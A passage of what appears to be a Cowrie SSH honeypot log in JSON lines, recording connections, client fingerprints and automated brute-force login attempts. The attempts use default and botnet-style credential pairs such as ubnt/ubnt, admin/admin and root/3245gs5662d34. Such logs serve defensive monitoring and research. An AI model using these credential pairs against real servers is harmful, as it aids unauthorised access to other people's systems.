["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:05:06.653259Z","src_ip":"103.217.145.104","session":"4abcc1adaac7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54022,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f36231ade59","protocol":"ssh","message":"New connection: 212.227.235.229:54022 (1.2.3.4:22) [session: 6f36231ade59]","sensor":"my-vps","timestamp":"2025-08-26T04:05:06.717406Z"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:05:06.779848Z","src_ip":"212.227.235.229","session":"af2c0cea9bc7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:05:07.195918Z","src_ip":"212.227.235.229","session":"6f36231ade59"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:05:07.302008Z","src_ip":"212.227.235.229","session":"6f36231ade59"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:05:08.035963Z","src_ip":"103.217.145.104","session":"4abcc1adaac7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54788,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0a6aae16b74","protocol":"ssh","message":"New connection: 212.227.235.229:54788 (1.2.3.4:22) [session: b0a6aae16b74]","sensor":"my-vps","timestamp":"2025-08-26T04:05:09.123598Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60576,"dst_ip":"1.2.3.4","dst_port":22,"session":"75c4945481e1","protocol":"ssh","message":"New connection: 212.227.235.229:60576 (1.2.3.4:22) [session: 75c4945481e1]","sensor":"my-vps","timestamp":"2025-08-26T04:05:09.408666Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:05:09.420532Z","src_ip":"212.227.235.229","session":"75c4945481e1"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:05:09.518778Z","src_ip":"103.217.145.104","session":"4abcc1adaac7"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:05:09.671658Z","src_ip":"212.227.235.229","session":"75c4945481e1"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":52642,"dst_ip":"1.2.3.4","dst_port":22,"session":"232c637b0c59","protocol":"ssh","message":"New connection: 103.217.145.104:52642 (1.2.3.4:22) [session: 232c637b0c59]","sensor":"my-vps","timestamp":"2025-08-26T04:05:09.786277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:05:09.786951Z","src_ip":"103.217.145.104","session":"232c637b0c59"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:05:10.055427Z","src_ip":"103.217.145.104","session":"232c637b0c59"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:05:11.172853Z","src_ip":"103.217.145.104","session":"232c637b0c59"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:05:11.443127Z","src_ip":"103.217.145.104","session":"232c637b0c59"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:05:11.444080Z","src_ip":"103.217.145.104","session":"280c9dd7e25d"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T04:05:11.852739Z","src_ip":"212.227.235.229","session":"af2c0cea9bc7"}
{"eventid":"cowrie.session.closed","duration":"10.1","message":"Connection lost after 10.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:05:13.123365Z","src_ip":"212.227.235.229","session":"af2c0cea9bc7"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-26T04:05:15.532890Z","src_ip":"212.227.235.229","session":"6f36231ade59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60614,"dst_ip":"1.2.3.4","dst_port":22,"session":"39cf17347a71","protocol":"ssh","message":"New connection: 212.227.235.229:60614 (1.2.3.4:22) [session: 39cf17347a71]","sensor":"my-vps","timestamp":"2025-08-26T04:05:15.619957Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:05:15.634626Z","src_ip":"212.227.235.229","session":"39cf17347a71"}
{"eventid":"cowrie.session.closed","duration":"10.7","message":"Connection lost after 10.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:05:17.466492Z","src_ip":"212.227.235.229","session":"6f36231ade59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43660,"dst_ip":"1.2.3.4","dst_port":22,"session":"8419b8ec7e3b","protocol":"ssh","message":"New connection: 212.227.235.229:43660 (1.2.3.4:22) [session: 8419b8ec7e3b]","sensor":"my-vps","timestamp":"2025-08-26T04:05:17.805685Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:05:17.814077Z","src_ip":"212.227.235.229","session":"8419b8ec7e3b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60590,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa052d0beb32","protocol":"ssh","message":"New connection: 212.227.235.229:60590 (1.2.3.4:22) [session: aa052d0beb32]","sensor":"my-vps","timestamp":"2025-08-26T04:05:18.850210Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:05:18.851292Z","src_ip":"212.227.235.229","session":"aa052d0beb32"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:05:19.147253Z","src_ip":"212.227.235.229","session":"aa052d0beb32"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T04:05:22.669817Z","src_ip":"212.227.235.229","session":"aa052d0beb32"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:05:24.207085Z","src_ip":"212.227.235.229","session":"b0a6aae16b74"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:05:25.573605Z","src_ip":"212.227.235.229","session":"8419b8ec7e3b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-26T04:05:27.214779Z","src_ip":"212.227.235.229","session":"8419b8ec7e3b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60606,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4dd2e130b3e","protocol":"ssh","message":"New connection: 212.227.235.229:60606 (1.2.3.4:22) [session: c4dd2e130b3e]","sensor":"my-vps","timestamp":"2025-08-26T04:05:27.245100Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:05:27.307820Z","src_ip":"212.227.235.229","session":"c4dd2e130b3e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","ke